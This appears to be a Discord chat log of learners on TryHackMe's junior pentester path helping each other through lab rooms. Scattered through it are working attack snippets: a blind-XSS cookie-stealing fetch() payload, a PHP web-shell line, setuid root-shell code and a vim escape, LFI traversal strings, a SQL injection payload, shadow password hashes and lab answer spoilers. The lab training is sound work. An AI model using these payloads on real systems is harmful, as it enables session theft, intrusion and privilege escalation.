#junior-pentester-path

and now this

Go to gtfobins (its a website). Search for the SUID enabled binary you found

It'll tell you how to use it

what q r u doing?

Metasploit: Exploitation

Someone said not to do that earlier I thought

What payload should I use?

ok am i being dumb? Linux PrivEsc task5, wget permission denied.....

You don't have write access to the directory your in

omg

😂

uhhhh

Hi! Short question: is anyone working on Jr. Pent Tester - Privilege Escalation - Linux PrivEsc at the moment? I just want to check if you encounter problems with the VM deployed for Task 6 ?

I completed all of linux prives without any vm issues

thanks @steel nymph @drifting drum

Gave +1 Rep to @steel nymph

Huh. Weird. Never seen that before

although with VPN + ssh I can connect to the IP that shows on the top of the room

I had same issue but you can still ssh

meterpreter/reverse_tcp?

Yes

same with me, but u can use ssh

thanks

Gave +1 Rep to @drifting drum

yes ..... but I need to have a "env_keep"

my computer is, yes

I'm not using the attackbox

The target

You don't matter

Oh

lol

small brain moment

You can use all 3 of those to escelate

Gtfobins if you don't know how

Oh, ok ... just thought that the env_keep was a must to have on the machine

Nope

Again it's just showing you possibilities

i got pass in base64 now i need to encode it?

No

Why would you need to?

quick question on LFI #2 (fileinc room)

2. In this section, the developer decided to filter keywords to avoid disclosing sensitive information! The /etc/passwd file is being filtered. There are two possible methods to bypass the filter. First, by using the NullByte %00 or the current directory trick at the end of the filtered keyword /.. The exploit will be similar to http://webapp.thm/index.php?lang=/etc/passwd/. We could also use http://webapp.thm/index.php?lang=/etc/passwd.

What is the current directory trick? I search on the previous section but couldn't find it. I'm not completely sure why it works.. is it related to php specific behavior?

u can read flag3 same way, if u know where it is

which way u did?

bunch of symbols when decoding

Sounds more like he's trying to read a binary file

$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7:::

and where is base64

You have what you need lol

You're just trying to give too much in the answrr

That too

I did see "You are not allowed to see source files!" with /etc/passwd as input, but not sure why adding /. at the end bypass this 😕

morning guys im already 2 days on file inclusion lab, can someone help me

probably cuz it helps not to add .php if u look at error

i need to use unshadow?

Does this error mean anything different or should I just restart the machine and do it again

on lab3 i found etc/passwd but i cant answer the question

what is the question?

Give Lab #3 a try to read /etc/passwd. What is the request look like?

still dont get it i got hash in base64 decode /etc/shadow,how can i make it in cleartext

im using nullbyte option

to decode a hash u dont need base64, try using other tools shown above

if u r able to read etc/passwd, how does ur url look like? ||<ip><answer>||

Argh it timed out again

stuck at file inclusion task 8, flag2, can someone help please ? - I am at the admin page at the moment

ah i understood now, so silly of me, thank you!!

Gave +1 Rep to @steel nymph

I guess the page doesn't explain how does the developer "filter" the keyword? What does include(/etc/passwd/. mean? it's not pointing to valid path, right?

I understand the nullbyte because there's section explaning it

include("languages/../../../../../etc/passwd%00").".php"); which equivalent to → include("languages/../../../../../etc/passwd");

i cant get the etc/passwd anymore

u can send me screenshot what u have done so far

private ou here?

priavte, dont spoil

can anyone help me with crontab, i configured, but cant have reverse shell

still no change

yes

copied from example above

but with my own ip and portt number

Make sure the file is executable lol

That got me for a good 15 minutes

i think connection problem, restarting

For the last section of https://tryhackme.com/room/metasploitexploitation , I made a payload, and I'm trying to run it on the target, I got the file via wget, and I am root, but it says bash: permission denied when I try to run it. I'm assuming the correct way to run it is just with ./payload_name?

I cant use telnet properly

Oh...

I just ran it after doing chmod +x, and it still did not work, and it looks like this

Was I supposed to do something other than -f raw > shell.elf to export it from msfvenom?

Wait I'm dumb

did that

Hey, in the room: Cross-site Scripting Task 8 Practical Example (Blind XSS) I am able to capture cookie via THM Request Catcher, but I cant catch cookie with netcat. I am doing it with code:
</textarea><script>fetch('http://tun0IP:9001?cookie=' + btoa(document.cookie) );</script>
then I wait bbut netcat returns nothing, can some one help with this one ?

Did not

It did that before I opened it

nvm netcat, go with the site

I used linux/x64/meterpreter/reverse_tcp

same problem

Is that right?

I feel really dumb rn

uname -a returns x86_64

is it linux machine or windows?

You mean the target? Linux

yes, oh ok

wait, is it a bad idea to show my tun0 ip

thanks

https://tryhackme.com/room/protocolsandservers

I need help with task 3

I am connecting with telnet

and whats the problem?

Yes, could be use to hack you

well I can not run commands 😄

or I dont know how to use telnet

just read it again thourgh, everything is given above

just follow it

do you need help with the xss lab?

try again, if stuck, ask back again

can someone help for the Linux PrivEsc room > task 9; the cronjob does not want to give me revshell

Now I get this error when running it

is this the correct handler to use?

thanks will try

Gave +1 Rep to @steel nymph

worked thanks!

damn

how do I know if its staged or not

oh

well yes, but I get this when I execute ./shell.elf on the target

Look at the name of the payload. Meterpreter/reverse_tcp is staged. Meterpreter_reverse_tcp is not staged

oh thanks

staged has "/", stageless has "_"

ARGH

sigh

I need to understand something on linux privesc task 7:

||I see that base64 has suid and owned by root, so why can't I still run it as root?||

oh this is probably guid?

i mean SGID

so as I understand I should be able to run them with sudo

or that I run them without sudo and they will act as sudo

oh yikes

so why all the gtfobins suid vulns are with sudo

Be very careful with how you're using the word "sudo"

sudo is a command that lets you run commands as other users, usually root.
Code running as root isn't acting as sudo

so sudo has nothing to do with this specific task, I just need to find the right suid vuln

yea I read and it was about nano example however this time ill user something else probably

cause I checked like 2 commands and none worked yet so I thuoght that maybe I missed something

why the fcuk does my terminal freezes whenever i try to interact with my fcuking nfs mount !

I'm probably goin to break this fcukin shit of PC now!

having problem with nfs, i run the ||./nfs||, but its not giving me root

any suggestions?

did u mount?

u gave perms?

yes, can see shared files

yes I have defiantly missed something

is it an suid?

yes, can execute, but still ||karen||

send ss

yes

||I copied the bin file and run it as karen instead running at /usr/bin/...||

wait how do I spoiler inside a command lol

||its super id||

inside a message

i hope u made the suid in your machine as root

i did

what's your code

cool tnx

coz this is all u need

same

showmount -e ip u did this right? and checked the shared dirs

show me your mount command

||yes, i have shared directory, i have my scrips compiled, i gave permissions and i did run from karen, but all it changed was "$ ./nfs
karen@ip-10-10-242-0:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
" ||

send ss

||-rwsr-sr-x 1 ubuntu ubuntu 16144 Oct 24 20:59 nfs||

created a mount directory in your local machine
mount -o rw ip:/target_mount /local_mount
created the malicious file in local mount and gave suid perms
executed it in the target machine

make sure u follow the same ! no ups no downs

yeah, i did same

be sure to delete that file when you are done... you don't want a suid bash on your own system 🙂

@visual crest why the hell is my terminal freezing? Guess what! i haven't be able to complete the NFS room yet! this just won't let me do

did you try the attack box?

the onely change is from $ to ||karen@ip||

yeah! but sadly 1hr over 😦

and i was at 97%

😐

close evrything ! make a fresh start

I'm not sure why it freezes

yes I think I had the switch I needed, I remember I learned suid once in the past and didn't understand nothing

well it was on the past when I really didn't understand nothing about this world lol

now things are better

and made this task tnx

suid are simple! they just help you escalate to a higher privilege. For example, you want to buy the latest game that's yet to be released. But u want it badly. So u enumerate among your relatives lol..And u found out that your father's friend is the head of the game company. And guess what! u can literally just get the game for free

sorry to interrupt with another room.. web-xss the blind-xss part. other users above already posted the same problem with not receiving the http request. I think it's because of ||CORS|| . I got the cookie with another trick, but was wondering ... what is the intended way to solve? And shouln't the room talk about this as well?

Lol there's a little more to it than that. SUID is a permission that can be set on files. The the SUID bit in enabled, the file will run with the permissions of the user who created it. So if you find an SUID file, usually you can find some way to exploit it to escalate your privileges to the user who wrote the file

yeah! just let it be a small example 😄 lol

Yea

one of the simplest examples I've heard

do the crontabs running every minute?

because there is a file on the crontab ||/home/karen/backup.sh|| that should run as root, and I've setup ||rev shell for the connection and copied the command (ofc changed the ip and port) from the task should I wait any longer it has been 8 minutes ||

wait maybe I forgot something

maybe || execution prevs were missing? ||

lets wait a minute

yes

exactly

thanks

sometimes I just need to explain what did I do to someone and I figure it out, on work I have my co-workers for that lol

i'm just goin the break my motherboard today 🙂 Hope it rests in peace 🙂

did anyone write program for sql blind time-based attack on go?

Anyone having problem with Passive Reconnaissance room? I know I'm putting in the right answer and it keeps telling me it's incorrect! But there's only 1 name server sooooo.....

for walking an application, i've placed the correct flag for the network task, but it says it's incorrect

okay so we're sorta in the same boat there. Do we reach out to the dev team at this point?

hmm

I even looked up a previous writeup and it has the same answer

I'm stuck lol

i am too

i've tried () on either side, on both sides

still wont work

maybe we should try in different browsers??

ima try

Hey, I am in the middle of mike myer's network+ prep course but I'm not planning on getting the cert, does TryHackMe teach you enough about networking for pentesting or should I finish the course first?

I've never taken any networking courses and I'm doing just fine

But it all depends on how you learn

@steel nymph under the WhoIs task the last question regarding the name server. Should be cloudfare.com

u did misspelling maybe?

like letter "l"

I copied and pasted that badboy too though

cloudfare or cloudflare?

jesus milk and cookies

im taking a break

lololol

But do you think tryhackme teaches you enough about it as a begineer? or is it missing some stuff?

does database name for blind time-based sqli is ||s_l__fou_|| or my script is broken ?

Again it depends on how you learn. I do a lot of research while I'm learning. So tryhackme thought me somestuff and I learned more about it on my own. I can't tell you if it'll be enough for you it depend on you

That's wrong

Very wrong

for walking an application, i've placed the correct flag for the network task, but it says it's incorrect

Alright, thanks.

Gave +1 Rep to @drifting drum

Then you don't have the right flag

hmm

show what u wrote with spoilers

||THM{HEADER_FLAG}||

is that not it?

ohhh

i got it

lol, now its writing something different

it takes longer to boot windows than exploit it here at the finish line lol!!! Great track though. Learned a ton!

can anyone help me crack shadow hash, attack machine taking so much time

im using rockyou

yes

yes

i copy pasted

oh so close

copy this part, then save it to a file, hash.txt, then run this command, john hash.txt

i did

use john default wordlist

||$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51||

i manually typed this on page and it was returning with delay
tested to add next letter but no result

capstone challenge of lin privesc

im running both hashcat and john, taking long time

i think this hash has a problem i solved this room one hour ago but it didn't take that much time

but im trying 2 hashes

not only one, one is given password

missy's hash only

I think the privesc room is the best room by far

let me try

||you got missy password?||

yes

privesc from ||missy||

anyone got a second to help me with file inclusion task 4 question 2. Guess i dont understand what it wants for the directory

only windows privesc and I'm officialy jr pen tester!

thought I would get any voucher :/

yeah is it wanting something like the var/www/html or am i totally missing something else?

You see the hint ?

it tells you in the include function, there is a directory name

ok ill keep hammering at it

thanks everyone, i got it

Ok lol.. it's still wrong

in task 7 linux privesc got error when using ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Error detected while processing command line:
E319: Sorry, the command is not available in this version:

Dumb question on the Burp module:
...expand the various levels of the application directory. What do we call this representation of the collective web application?
answer: xxxx xxx

https://tryhackme.com/room/rpburpsuite (seems dumb because I'm sure I could figure it out but don't want to bother now and have already tried things like HTTP GET, root/home dir, HTML DOM, etc.)

I thikn it's asking about an agnostic term, not specific for the exercise.

Oh, woops. it's part of the CompTIA Pentest+ path.

Task = Target Definition, my bad. First time asking for help here. Just joined and trynna blow through all the THM paths.

oh

got it.

since most answers are super simple for these rooms I knew it was something i was missing....maybe it's time for another slice of 🍕

Also, my b if this was the wrong channel. seems jr pentester is diff from comptia one.

Hello I'm stuck in on task 6 of subdomain enumeration using ffuf.

I've tried searching here for same issues and people have said to restart the attackbox, I have and I am still getting this. is this suppose to be correct?

I get a bunch of these:

:: Progress: [1907/1907] :: Job [1/1] :: 322 req/sec :: Duration: [0:00:06] :: Ezw                      [Status: 405, Size: 472, Words: 98, Lines: 15]
:: Progress: [1907/1907] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:06] :: Ezlog                    [Status: 405, Size: 472, Words: 98, Lines: 15]
:: Progress: [1907/1907] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:06] :: E:: Progress: [1907/1907] :: Job [1/1] :: 324 req/sec :: Duration: [0:00:06] :: E:: Progress: [1907/1907] :: Job [1/1] :: 324 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

LFI task 4 last question im stuck.

See this example picture

got it with view tnx

check the error message you get, the answer is right there

lab2.php didnt work

Guys, in file inclusion task 8, flag3, i see the / incrementing everytime we do a trial and error, am i missing anything major here ?

No

that is not the directory

wow nvm..lol

😫

i got it

hmm lol

i thought redline was driving me crazy, file inclusion is higher than that 😄

how do i get the pentester role?

three tickets with the pentester title, if you want in discord, you need to link your discord token from thm and register that to the thm bot

hmm

i mean

i have redeemed it

oh wait

do i have to complete the path?

nah

oh good

can someone give me an direction on how to get RCE on the playground. i tried adding <? php system($_GET['cmd']); ?> to the user agent to see if i would be able to run commands but didnt work out

Or just send !verify <token> again to the bot

ima try

thx guys

i appreciate it.

am i on the right track?

can anyone help me in burp suite section?

the form action in for the task 8 challenge three has been set as .//chall3.php, is that why everytime we do a trial and error, the / increments ?

i have an issue with Windows privesc room > Task 6 Unquoted Service Path > last question where i should obtain Administrator privileges, when i get to the final point to restart the service it won't start. Any advice, hints?

try net start unquotedsvc, I finished that room yesterday so i might be wrong

dang these privesc rooms are intense bro, so long

the first 95% of the path didn't take as long as these 2 modules 😂

i need some help for task 8 SQL Injection room, so far i found database, table and column name how can i find the password

whats ur table

or i should say are you sure you have the right table

||TABLE_SCHEMA='sqli_four' and TABLE_NAME='users'|| is this the right table?

yeah - also i think your supposed to put the spoiler tag things on. Youre on the right path just keep enumerating other column names

oh ok and how to put spoiler tag things on?

||test||

oh thanks

Gave +1 Rep to @tulip elm

once you have the column and need the specific password, this command from the previous boolean section will help: admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%

👍

Thanks, i tried this and netcat listener on the other side, and finished the room! Though it still wrote that service Failed to start, i saw i got a connection back and searched for flag location.

Gave +1 Rep to @cobalt skiff

were you able to find a solution? I have the same issue been like this for two days, tried restarted the attackbox many times

no. I even made a post on the community forum for that path. I'm hoping I get an answer once the week starts.

oh i see thank you. Please keep us updated. this stinks for us

Gave +1 Rep to @acoustic spindle

anyone know what that Robocop thing means?

I'll make sure to come back and let you know either wya

Can anyone help me here ? Topic: File Inclusion Task 8 flag 2 hints to check the cookies, which I modified to admin and got this page.

I am not understanding what should be the path here

You're getting there. Play with the cookie more

I confused

Couldn't help myself so I thought of asking.

I am* confused.......lol !

I am not getting the right path

That's where I am going wrong.

Right ?

Idk. What have you tried?

/challenges/chall2.php?file=../../../etc/flag2

that's what I tried

Also I modified path with different types

You didn't listen to what I said lol. Keep playing with the cookie

Nope I still didn't get

😦

Combine your answers. Thats all I can say. Anything else would be giving it away

Thank you @drifting drum ❤️

Gave +1 Rep to @drifting drum

wooo I did it!

I figured it out. What I did is start the next room while I waited. Started the attack box there. there are two ips, you have to use the 2nd ip, not the first one at the very top, but the one on top of the task 1 that says "active machine information"

I ended up finishing the new room first then went back and finished up the prior room using the same ip even though I started a new attack box again in the prior room. (ip didn't change)

who complete the Cross-site Scripting room

i need a little help

see above #junior-pentester-path message
basically you want to look in the directory /assets

anyone could help me with command injection...task 5....2 question...find the flag content...cat does not seem to work

did u forget shell operators?

hey there...i manged to crack this...tx

Okay i really learned allot about nmap with the NetSec Challenge really liked that.

Getting 502 bad gateway accessing file inclusion lab.

It's pretty easy, you don't have to use an exploit, just do a directory traversal

Is it just me who's finding the sqli room really confusing?

It's all there in the examples. I don't think it's confusing. I would go as far to say I found it the easiest in that section.

Which part is hard?

Probably just me then

Lol I don't know. Some others have posted questions about it.

super noob question here, I tried curl and it worked, but why did it worked on curl but not on dev tools or burp, it's the same exact step, really appreciate if you can tell me why, thanks 🙂

Gave +1 Rep to @deft valley

hii can some one tell me how one can exploit a bin file when they are not part of sudoers

i cant run a gtfobin exploit because iam not part of SUDOERS list on that machine

Hello Guys in Linux PrivEsc TASK 7 I figured out SUID ||base64|| and got passwords for user2 and gerryconway and enumerated them but I am not sure where to go from here. Can anyone please nudge me in right direction

Did you type ||sudo -l|| to see what you can run?

did you black that out or it gets blacked out?

I did it

Not sure why

i have found out wht files have SUID bits set for the user

and i have searched for them in GTFObins but all that i have found need sudo permission to run them

Ok.

and that user is not in the sudoers list to do so

What task are you on,?

linux privsec

Which number ?

task 7

Which task and which question are you talking about?

Task 7

Local File Inclusion challenge 1

And how is the request that's not working in burp looking like, you have a screenshot?

have you completed it by any chance??

Any ideas why acme it supports website refuses to load in Content discovery room

Nah I though you were on am earlier one

What is the value of the staff-session cookie?

when i decode it i get answer

Okay, got your screenshot, could you also show me the curl request you made? I mean I already see why it's not working, but would be interested in how your curl request looks like 🙂

but it's showing that answer is incorrect

it's right below the burp screenshot

c2Vzc2lvbj04OGE1ZTZhZjVhYWE4YWM0ZDliYTllY2U0NjAxY2NhYg== this is the base64 value

session=88a5e6af5aaa8ac4d9ba9ece4601ccab this is the decoded value

still it's showing incorrect

Oh, it's so small I didn't saw it, but it seems to be cut off? So I can't see the full request. Did you not put any header in that curl request?

that's all of it

Okay, so my assumption is that curl by using the post request by default will set the header to Content-Type: application/x-www-form-urlencoded so if you add that to your burp request it should work.

thank you very much, I would try it later.

Gave +1 Rep to @shadow echo

I got a different one. What did you try? (you are talking about XSS-last task?)

(feel free to PM if you want)

Yes buddy

Do not try to do it in ur local machine, do it in ur attackbox

I too took help of one of my friend where he just wasted 3 hrs for this things

Thing*

@hazy kraken

(I already have the accepted session)

did you solve it?

Where attackbox or local machine ?

local. starting attack box to try it there.

Yes do it on attackbox close that connection, its of no use

For this task, u need to do it using attackbox, to grab the right staff session cookie

And then just decode the base64 value to know the answer

I somehow doubt that it's only working with the attackbox 😄

it works in both machines for me (yet none of them works using the HTTP request)

Try it urself and u will come to know

Hi, im working my way through File Inclusion room and have no clue how to get flag3 in task8. If anyone could give me a clue it would be great. Currently I still can't include any special characters

Well @hazy kraken already confirmed that it's working for him on either attackbox or local. But ye, will come back to you when I did that task 🙂

Yes, because i did it on both 😂

But it just worked on attackbox

you already learned the trick before

I mean both the cases provided me the session, but the right session was given by attackbox

Session cookie*

Im pretty sure I tried every technique mentioned in the previous tasks

hmm. I cannot find the specific task right now. did you try/think about all 4 entry points mentioned in this "Steps for testing for LFI"?

Did try other HTTP request methods, changing some values of http headers, different ways to include path, looked thorough errors and did all of that with burp to exclude possibility of it being front-end filter

I'm having some trouble getting the reverse shell to work on the crontab task of linux privesc. I've tried the commands listed in all the cronjobs, but I'm not getting any response.

let me try it myself again. ||request method|| should be the one to go with.

Alright, gonna try work on this a bit more, thanks

Gave +1 Rep to @hazy kraken

Need help please: File Inclusion - Task 8 -Flag1
In firefox dev tools, under network tab I am editing and resending the request. I have changed the method to POST. This is my query string** file=/../../../../etc/flag1**. I have tried using null bytes %00 and character escaping. I have tried variations on the query string, yet no joy. Thanks 🙂

I'm trying to use post/windows/gather/enum_domains, after getting a meterpreter session on the target machine of https://tryhackme.com/room/meterpreter, but when I try to run it, I get this error

How are your request headers looking like in the dev tools?

how do you look at the crontab? you should find a job with a script you can modify if I recall correctly

alright. got it back working. how did you try the ||POST|| requests? Maybe I can hint you in the direction.

You want to make sure to have the Content-Type: application/x-www-form-urlencoded header set in your request.

I have found all the scripts using cat /etc/crontab and modified all of the available ones using the example script in the explanation. I have even tried manually running the script to verify connection. For some reason I cannot get the cron jobs to work.

what did I do wrong this time

what about rechecking payload and module both

Okay, thankyou! I'll give it a go. Am I close?

Yes

hm?

chmod maybe, typo in the name?

||file=....//....//....//etc/./flag3 included in path and body||

close. but let's assume the source looks similar to this ||if (not_valid($_GET['file'])) { $path = filter($_GET['file']); } else { $path = $_REQUEST['file']; } access($path.".php");||

ah and did you also put Content-Type (justlike Fontaene mentioned above for a different task?)

Oh god, missing header was the issue, thank you soo much ive been stuck there for a while

Gave +1 Rep to @hazy kraken

np.always the small details 🙂 I used curl which automatically takes care of this header 🙂

Oh i had no idea curl does that, that's great to know 😅

what do you mean?

Yeah. I get the same issue. Doesn't accept the base 64 decoded cookie

I've added Content-Type: application/x-www-form-urlencoded in the header, and then gone through the process again with all variations of file path as mentioned previously but no luck. Any other clues?

And thanks @shadow echo for the help

Gave +1 Rep to @shadow echo

Well you might want to verify your THM account in discord in order to be able to send screenshots, so it will be easier to help you.

!docs veriy

!docs verify

Done. Should I dm you?

No you can just paste the screenshot from the request which is not working in here.

this is so dumb

bruh

I have every other answer except this question

relook at ur url/query @vital depot

I don't even really care at this point, if you wanna just tell me the answer go ahead

I have spent like over 4 hours on the metasploit modules

Ooops. Yea tried it previously with the correct amount of ..'s in the path and that didn't work either 😄

You have to background the meterpreter shell first

ctrl+z

I did that

Then run the module and foreground it.

Then restart? Because I did that and it worked

Tried doing that and it killed the meterpreter session

First of all I would get rid of the ?=file (and everything after that) in your URL as you are not making a GET request

Hi, for linux privEsc task 6, “what is the hash of Frank’s password”. Is it in the etc/shadow ? Anyone can share how get the permissions? It shows “user Karen is not allowed to execute ‘usr/bin/cat /etc/shadow’ as root on ip*******

You're meant to escalate your privileges to root then you can read the hash which is the whole point.

I'm not sure what to do in that case, sorry.

sudo -l

Is this for the LFI room task 8 challenge 1?

Yes

Are you meant to use Burp Suite with a GET request? I tried the same to no avail.

So SutterCane is using the dev tools right now, but either way the challenge says you have to make a POST request, so a GET request will not work.

Oh yeah I meant a POST request. Did it with burp yesterday and had no response on the website sadly

Hi! Any extra hints for Linux PrivEsc task 10? created the "path" file and the thm in /tmp but after running "path" it does not return an elevated shell ....

Well if you send a screenshot of your POST request in burp I can let you know where the issue is.

iirc, you need to write on a file that's already writable

or make a file on the writable dir

where u can write files

anyone else know? using WSL2 if that makes a difference

find / -writable 2> /dev/null did u do this?

I did ... on /tmp, created the "thm" file and echoed /bin/dash on it

yes

Hi I am stuck at the JR Penetration Tester path at Introduction to Web Hacking File Inclusion. Task 4 Local File Inclusion - LFI. The last question they ask that: "In Lab#2, what is the directory specified in the include function?". I dont understand what they want me 2 do i tried everything, checked for write-ups which i cant find. I think the answer is very easy but I cant figure it out. Is there anyone who can give me a hint?

hint : /home/murdoch

alrteady there - running "path" file from there

should i share my notes?

or just more hints

you can share your notes but on a DM - so we will not spoil the fun for the others?

oh okay

Have you entered an invalid input and checked the error/warning messages?

Did you change your path?

Yes I did, i get 2 warnings tried typing parts of the warning but didnt work

So in the example above include("languages/". $_GET['lang']); the developer specified to use the languages directory for his include. So regarding to that, check the warning again to see which directory is specified for the last question of that task.

do you use Lab#2 or still in Lab#1?

@north dove gave me a good ideea that I never thougth at - it worked like a charm! Thank You!

Gave +1 Rep to @drifting drum

Found the answer, thank you!

Gave +1 Rep to @shadow echo

at this point anyone that knows the answer to this question of https://tryhackme.com/room/meterpreter DM me with the answer

i am done with this

lol

keep trying

Literally been doing this one question for 2 hours now

just 2hrs?

And I keep getting the same error

lol

is there any paragraph before

send that please

i can't access the room. I'm not a subscriber

oh

well the hint says ||Use the "post/windows/gather/enum_domain" module. You will need to background Meterpreter first and set the SESSION parameter.||

but this is really annoying because I don't know if I'm doing something wrong or there's another problem

if you don't mind can you send the whole page ss? lol!

Probably impossible to read but here

https://tenor.com/view/where-is-it-look-close-honey-i-shrunk-thekids-looking-gif-12615961

lol! i'm tryin

If you click open original it's kinda readable

send the qn

Have you tried to do the question on the attackbox in order to check if there is an issue with your operating system or if you simply doing something wrong?

well I guess I could do that

is there any other module apart from this?

no idea

check up

As you are doing a POST request, the parameter doesn't belong to the requested URL. So therefore you first of all have to get rid of the ?file= (and everything after that, except the HTTP/1.1) and put the requested parameter in the right place. Also you will have to specify the correct Content-Type in your header.

IT WORKED

guess it was a problem with my setup then

I have the answer but I still fail to understand it, the function is include("languages/". $_GET['lang']); how come that in the error it says the directory is includes? shouldnt this be languages/ ?

https://tryhackme.com/tommypickaxe/badges/metasploitable

Thanks to everyone who helped

Congooooooooooooooooooooo!

No why? The developer can name the directory to anything he wants. If he names the directory banana then that would be the answer.

But the error gives back what you input into the function right? and the input is languages/ shouldnt you see that back in the error?

Well the error gives back what directory is specified in the include function. So as you have found the correct answer now, that's exactly what happened. The above code with include("languages/". $_GET['lang']); is just an example. So if I'm the developer and I named my directory banana, then my include function would look like that include("banana/". $_GET['lang']); and the error would reveal that.

Anybody finish Task 6 in https://tryhackme.com/room/protocolsandservers2 ?

Yeah, what's the problem?

Ended up with this. Not sure where the parameter is meant to go though.

ooooh it's an example lol i thought it was the back-end code 😆

Not sure which wordlist to use tried several and no dice EDIT: Was tired and put wrong IP RIP

rockyou would to the job

I need a hint for the XSS room, task 8.

Even if I set a netcat listener, even if i use that website to get the requests, I still get my cookie instead of staff cookie.

Is the payload or am I overthinking it?

So in burp if you manually want to add the parameter, it belongs under the headers with 1 new line between. So in your case it would belong into line 12 with file=/etc/flag1 (just an example, not the right path)

Tried it as well.

The same cookie.

But you could for example edit the initial request in the dev tools, make it a post request, add the file=/etc/flag1 in the request body and then capture it in burp, so that you'll see where the parameter goes.

That seems much easier, thanks.

Gave +1 Rep to @shadow echo

Not a problem, let me know if you are still stuck after that.

So, anyone any ideas for the task 8, XSS room?
I'm getting my own cookie instead of staff.

Not quite sure how to edit requests in devtools though.

Are you on firefox?

Yes

Then you go into the network tab, send the initial request, then you should see it in that tab and simply right click it and click "edit and resend"

Right, thanks again.

I got it!

Can someone help me with the command injection task 5

This is beyond frustrating. I am dumb

@vital depot same bro but going forward

I am unable to traverse directory

Can someone help me

https://github.com/payloadbox/command-injection-payload-list

some of the payloads from here will do the job @loud spire

see which one allows you to bypass the filters and read from the file.

I have tried it, it's working but i need to go /home/tryhackme

why?

cat /home/tryhackme/flag.txt

Most of the payloads are working from payloadbox but the thing is i am unable to traverse

Not working

Just saying not working isn't helpful

What payload are you trying right now?

What have you tried that isn't working?

See, i passed the payloadbox cheatsheet to intruder and i can see that some of them are producing the desired output, but the things is i need to navigate to the directory /home/tryhackme and i am unable to do so

why to intruder?

To see what all payloads are working

In correct manner

again, why you need to traverse directories?

just use a payload that allows you to run a command

and use it to run whoami and cat

See cat /home/tryhackme/flag.txt isnt working

Whoami runs

Successfully

I need to cat to read flag

what payload are u using?

ls; whoami

Or ls; pwd

ls | pwd

it works.

with ls; as well

Tight. I've hit a road block myself.. for two days. I'm trying to contain myself ha

What should i do give ne some hint

try inserting the payload directly into the web

or follow the response in burp if you want to do it that way

the payload you're using it's working fine. just go to http://machineip and insert it there.

I'm going to grab something to eat. Lemme know if you got it working @loud spire

Can't get the structure, right?

Hello, I'm in Linux PrivEsc room task 11 (NFS), I followed exactly what exists in the text but I didn't get the root. Why?

Nuh uh. I've tried looking for POST request url examples so I'm not using** ?file=** in the url, but to no avail.

I could send you mine?

Tempting.. might just bang my head against this wall for a little longer. I'd take a hint though if I send you my query string?

Post it here. Just spoiler tag it

It's not really about strings. It's about formatting.

Yea, sorry I'm just referring to it in the context of the Query String box in dev tools

Hey, anyone having issues with the NMAP live host discovery TASK 2 view site option?

the view site option open up a network diagram of a subnet. we are excpected to select the To and FROM machines and then select the PACKET TYPE and send the packet. This doesnt work :/

I reverted back to using ?file= ... I know that's not correct but nothing else has worked

it just doesnt do anything

My dev tools don't have that so I had to use burp

LFI has been the one room that has given me trouble ngl

yep. neither does task 4.

done that. just annoying. probably try to open a new session

woah that worked lol. nvm. Thanks @steel nymph

Gave +1 Rep to @steel nymph

It should be file=inclusion goes here

Still no dice

I tried null bytes too, but that wasn't having it

Maybe just do it in Burp?

That's what worked for me

my vm wont load any webpages.. first time using a vm so im not sure what to do

thank you

Gave +1 Rep to @steel nymph

sorry to ask but are you unable to do it in the firefox debugger tool?

Yep

Mate, thank you ffs haha

Gave +1 Rep to @steel nymph

int main()
{ setgid();
setuid();
system("/bin/bash");
return 0;
}

For sure. It was worth it. Even for the tiny steps

this jr pentester path is just top notch

Thanks @tame fern for the help too

You need to put 0 in the parentheses after setuid and setgid. That code is setting your user and group ID = to that if another user. You want to be root, so you set it to 0 because thats the root gid and uid

okay i read back and still couldn't understand im stuck on file inclusion task 4 question 2

In Lab #2, what is the directory specified in the include function?

yes

the answer is right there when you enter a file name

in the error3

What do you mean exactly? i have the same problem i edited the GET to POST and resend it. Then i look for the response in the network tab but i dont see any change

so the goal isnt to find a file ?

Thank you 😁

Gave +1 Rep to @steel nymph

the goal is to identify the directory. if that is the same task you mentioned earlier

the include_path is the directory specified in the include function

maybe share a screenshot here of the error you see?

im very new

has anybody had issues logging into to the Windows Priv esc box? I've been getting errors for about the last hour

but this is lab1

okay then im lost

@vital depot How did you solve your POST request problem? i double clicked, opened new tab etc but it wont help and i have no experience with burp suite just took a look at that

go back to home, select lab2 and then enter a file name and see what you get

oh yeah im dumb

You can also do it with the dev tools in firefox, so no need for burp

For flag1? Can you post a screenshot of your dev tools request?

@vital depot

Can you right click on that request, edit it, and send a shot of the whole request window?

in the dev tools, you can inspect the webpage, then check the code where the form section is present, modify the METHOD type to POST, in the place where you have to add the file name, modify the source code with a value: "?file=add the file path here"

hi guys, i have a trouble with repeater exercise (burp), i send the request with the product modify to 1000 or symbol, but the response is always a 404 not found, and i cant achieve the 500 error requested with the answer, anyone can help here?

you can try a negative value

try a negative value

@vital depot

@twilit yoke include Content-Type: ||application/x-www-form-urlencoded|| in the Request Header, and file path payload in the Request Body. I didn't include the exclamation like @subtle forge suggested, but it worked. So I guess either will

its a POST request so you might have to enter the file path in the body of the requets

you deserve some drink bro, thanks a lot

Gave +1 Rep to @somber mulch

Thanks Buddy ... tried hard enough ..

Gave +1 Rep to @acoustic python

wow i get it now, thanks alot @vital depot @subtle forge

Gave +1 Rep to @vital depot

nvm

Cool man 🙂

glad to help! just started with THM 4 days ago and I am lovin it!

Did you already finish the Junior Pentest path?

nope. currently on Network Sec

are you able to do telnet portion?

In the beginning it goes very fast but now i've noticed it takes more time to complete rooms

which task are you referring to?

Protocols and Servers

Task 3

HTTP portion, i logged into telnet port 80 and Http request it

oh no. havent reached there yet

no flag :/

ahh ok.

sorry

things are getting harder

Np!

RFI capstone has to be the easiest bit of the LFI room

anyone know how long the passwords should take to crack? I'm at try 2000 with hydra and rockyou wordlist https://tryhackme.com/room/netsecchallenge

